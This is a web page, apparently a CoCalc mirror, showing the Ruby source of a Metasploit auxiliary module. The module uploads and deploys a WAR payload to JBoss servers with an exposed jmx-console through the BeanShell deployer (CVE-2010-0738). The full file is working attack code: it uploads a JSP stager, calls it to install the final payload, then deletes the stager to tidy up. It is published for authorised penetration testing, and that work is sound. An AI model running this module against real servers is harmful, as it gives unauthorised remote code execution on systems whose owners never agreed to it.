CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/jboss_bshdeployer.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HTTP::JBoss

8


9
  def initialize

10
    super(

11
      'Name' => 'JBoss JMX Console Beanshell Deployer WAR Upload and Deployment',

12
      'Description' => %q{

13
        This module can be used to install a WAR file payload on JBoss servers that have

14
        an exposed "jmx-console" application. The payload is put on the server by

15
        using the jboss.system:BSHDeployer's createScriptDeployment() method.

16
      },

17
      'Author' => [

18
        'us3r777 <us3r777[at]n0b0.so>'

19
      ],

20
      'References' => [

21
        [ 'CVE', '2010-0738' ], # using a VERB other than GET/POST

22
        [ 'OSVDB', '64171' ],

23
        [ 'URL', 'https://www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now' ],

24
        [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ]

25
      ],

26
      'Actions' => [

27
        ['Deploy', { 'Description' => 'Create and deploy app (WAR) to deliver payload' }],

28
        ['Undeploy', { 'Description' => 'Remove app (WAR) for cleanup' }]

29
      ],

30
      'DefaultAction' => 'Deploy',

31
      'License' => BSD_LICENSE,

32
    )

33


34
    register_options(

35
      [

36
        Opt::RPORT(8080),

37
        OptString.new('APPBASE', [ true, 'Application base name', 'payload']),

38
        OptPath.new('WARFILE', [ false, 'The WAR file to deploy'])

39
      ]

40
    )

41
  end

42


43
  def deploy_action(app_base, war_data)

44
    encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')

45


46
    if http_verb == 'POST'

47
      print_status('Deploying payload...')

48
      opts = {

49
        file: "#{app_base}.war",

50
        contents: encoded_payload

51
      }

52
    else

53
      print_status('Deploying stager...')

54
      stager_name = Rex::Text.rand_text_alpha(rand(8..15))

55
      stager_contents = stager_jsp(app_base)

56
      opts = {

57
        dir: "#{stager_name}.war",

58
        file: "#{stager_name}.war/#{stager_name}.jsp",

59
        contents: Rex::Text.encode_base64(stager_contents).gsub(/\n/, '')

60
      }

61
    end

62


63
    bsh_payload = generate_bsh(:create, opts)

64
    package = deploy_bsh(bsh_payload)

65


66
    if package.nil?

67
      print_error('Deployment failed')

68
      return

69
    else

70
      print_good('Deployment successful')

71
    end

72


73
    unless http_verb == 'POST'

74
      # call the stager to deploy our real payload war

75
      stager_uri = '/' + stager_name + '/' + stager_name + '.jsp'

76
      payload_data = "#{Rex::Text.rand_text_alpha(rand(8..15))}=#{Rex::Text.uri_encode(encoded_payload)}"

77
      print_status("Calling stager #{stager_uri} to deploy final payload...")

78
      res = deploy('method' => 'POST',

79
                   'data' => payload_data,

80
                   'uri' => stager_uri)

81
      if res && res.code == 200

82
        print_good('Payload deployed')

83
      else

84
        print_error('Failed to deploy final payload')

85
      end

86


87
      # Remove the stager

88
      print_status('Removing stager...')

89
      files = {}

90
      files[:stager_jsp_name] = "#{stager_name}.war/#{stager_name}.jsp"

91
      files[:stager_base] = "#{stager_name}.war"

92
      delete_script = generate_bsh(:delete, files)

93
      res = deploy_package(delete_script, package)

94
      if res.nil?

95
        print_error('Unable to remove Stager')

96
      else

97
        print_good('Stager successfully removed')

98
      end

99
    end

100
  end

101


102
  def undeploy_action(app_base)

103
    # Undeploy the WAR and the stager if needed

104
    print_status("Undeploying #{app_base} by deleting the WAR file via BSHDeployer...")

105


106
    files = {}

107
    files[:app_base] = "#{app_base}.war"

108
    delete_script = generate_bsh(:delete, files)

109


110
    package = deploy_bsh(delete_script)

111
    if package.nil?

112
      print_error('Unable to remove WAR')

113
    else

114
      print_good('Successfully removed')

115
    end

116
  end

117


118
  def run

119
    app_base = datastore['APPBASE']

120


121
    case action.name

122
    when 'Deploy'

123
      unless datastore['WARFILE'] && File.exist?(datastore['WARFILE'])

124
        print_error('WAR file not found')

125
        return

126
      end

127
      war_data = File.read(datastore['WARFILE'], mode: 'rb')

128
      deploy_action(app_base, war_data)

129
    when 'Undeploy'

130
      undeploy_action(app_base)

131
    end

132
  end

133
end

134


135